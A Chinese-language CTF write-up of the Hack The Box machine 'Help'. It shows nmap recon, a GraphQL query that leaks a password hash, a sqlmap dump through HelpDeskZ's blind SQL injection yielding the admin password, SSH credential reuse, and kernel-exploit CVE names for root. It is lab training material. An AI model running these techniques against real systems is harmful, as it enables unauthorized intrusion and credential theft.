靶机help-GraphQL+sql注入

信息搜集

NMAP

像往常一样,开始nmap扫描。找到http服务(80和3000)和ssh服务(22):

nmap -sT -sC -sV -O -p80,22,3000 -oA nmapscan/deatil 10.10.10.121
Nmap scan report for help.htb (10.10.10.121)
Host is up (0.29s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 e5bb4d9cdeaf6bbfba8c227ad8d74328 (RSA)
|   256 d5b010507486a39fc5536f3b4a246119 (ECDSA)
|_  256 e21b88d37621d41e38154a8111b79907 (ED25519)
80/tcp   open  http    Apache httpd 2.4.18
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
3000/tcp open  http    Node.js Express framework
|_http-title: Site doesn't have a title (application/json; charset=utf-8).
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 4.15 - 5.6 (95%), Linux 5.0 - 5.3 (95%), Linux 3.1 (95%), Linux 3.2 (95%), Linux 5.3 - 5.4 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), Linux 2.6.32 (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 5.4 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

WEB - TCP 3000

这个端口开放一个 HTTP API。访问时,会显示一条关于凭证的消息:

图片

查看响应头,我发现是express驱动的:

curl -v http://help.htb:3000/
*   Trying 10.10.10.121:3000...
* Connected to help.htb (10.10.10.121) port 3000 (#0)
> GET / HTTP/1.1
> Host: help.htb:3000
> User-Agent: curl/7.88.1
> Accept: */*
> 
< HTTP/1.1 200 OK
< X-Powered-By: Express
< Content-Type: application/json; charset=utf-8
< Content-Length: 81
< ETag: W/"51-gr8XZ5dnsfHNaB2KgX/Gxm9yVZU"
< Date: Thu, 14 Aug 2025 07:07:35 GMT
< Connection: keep-alive
< 
* Connection #0 to host help.htb left intact

经过谷歌搜索后,发现了GraphQL, 这是一种为 API 设计的查询语言。当尝试访问/graphql时,返回GET query missing.

尝试查询用户:


curl -s -G http://10.10.10.121:3000/graphql --data-urlencode "query={user}" | jq

{
  "errors": [
    {
      "message": "Field \"user\" of type \"User\" must have a selection of subfields. Did you mean \"user { ... }\"?",
      "locations": [
        {
          "line": 1,
          "column": 2
        }
      ]
    }
  ]
}

显示说必须有一个子字段,尝试username:

curl -s -G http://help.htb:3000/graphql --data-urlencode 'query={user {username} }' | jq
{
  "data": {
    "user": {
      "username": "helpme@helpme.com"
    }
  }
}

curl -s -G http://help.htb:3000/graphql --data-urlencode 'query={user {username,
password} }' | jq
{
  "data": {
    "user": {
      "username": "helpme@helpme.com",
      "password": "5d3c93182bb20f07b994a7f617e99cff"
    }
  }
}

显然是一个哈希值,破解以后是:godhelpmeplz

拿到用户名“helpme@helpme.com” 密码 “godhelpmeplz”

WEB - TCP 80

gobuster给我一个新的路径,/support 和 一个文件 readme.html
这是1.0.2 版本的HelpDeskZ

这个版本存在漏洞HelpDeskZ < 1.0.2 - (Authenticated) SQL Injection / Unauthorized File Download

EXP并没有直接适用于我。但在阅读代码的过程中,我理解了它的运作方式。基本上,我需要登录并创建一个工单。这个工单需要有一个附件(我创建了一个名为 1.txt 的空文件)。附件的链接是: http://10.10.10.121/support/?v=view_tickets&action=ticket&param[]=4&param[]=attachment&param[]=1&param[]=6 。如果我访问该链接,会弹出一个下载对话框。SQL 注入在最后一个参数中。这是一个盲注。我可以传递一些测试数据,并得到 true(下载的附件)或 false(出错了!)的响应。

可以通过 sqlmap 把库跑出来。

python3 sqlmap.py -r ~/notesPen/help/1.txt -D support -T staff --batch --dump

Database: support                                                                                                                                                                          
Table: staff
[1 entry]
+----+--------------------+------------+--------+---------+----------+---------------+-----------------------------------------------------+----------+----------+--------------------------------+--------------------+------------+------------------------+
| id | email              | login      | avatar | admin   | status   | fullname      | password                                            | timezone | username | signature                      | department         | last_login | newticket_notification |
+----+--------------------+------------+--------+---------+----------+---------------+-----------------------------------------------------+----------+----------+--------------------------------+--------------------+------------+------------------------+
| 1  | support@mysite.com | 1547216217 | NULL   | 1       | Enable   | Administrator | d318f44739dced66793b1a603028133a76ae680e (Welcome1) | <blank>  | admin    | Best regards,\r\nAdministrator | a:1:{i:0;s:1:"1";} | 1543429746 | 0                      |
+----+--------------------+------------+--------+---------+----------+---------------+-----------------------------------------------------+----------+----------+--------------------------------+--------------------+------------+------------------------+

sqlmap破解出Welcome1这个密码哈希

SSH

既然拿到一组密码,SSH也是开放的。可以试着尝试用一些用户名登录。最后 “help” 这个用户名成功了!

从家目录可以获取到 user.txt

提权

uname -a显示操作系统版本:
Linux help 4.4.0-116-generic #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux

版本并不新,搜索可能存在的内核漏洞:
CVE-2017-16995 - 44298.c and 45010.c
CVE-2017-5899 - exploit.sh

这三个任一一个都可以被利用

posted @ 2025-08-14 16:08  Merakii  阅读(12)  评论(0)    收藏  举报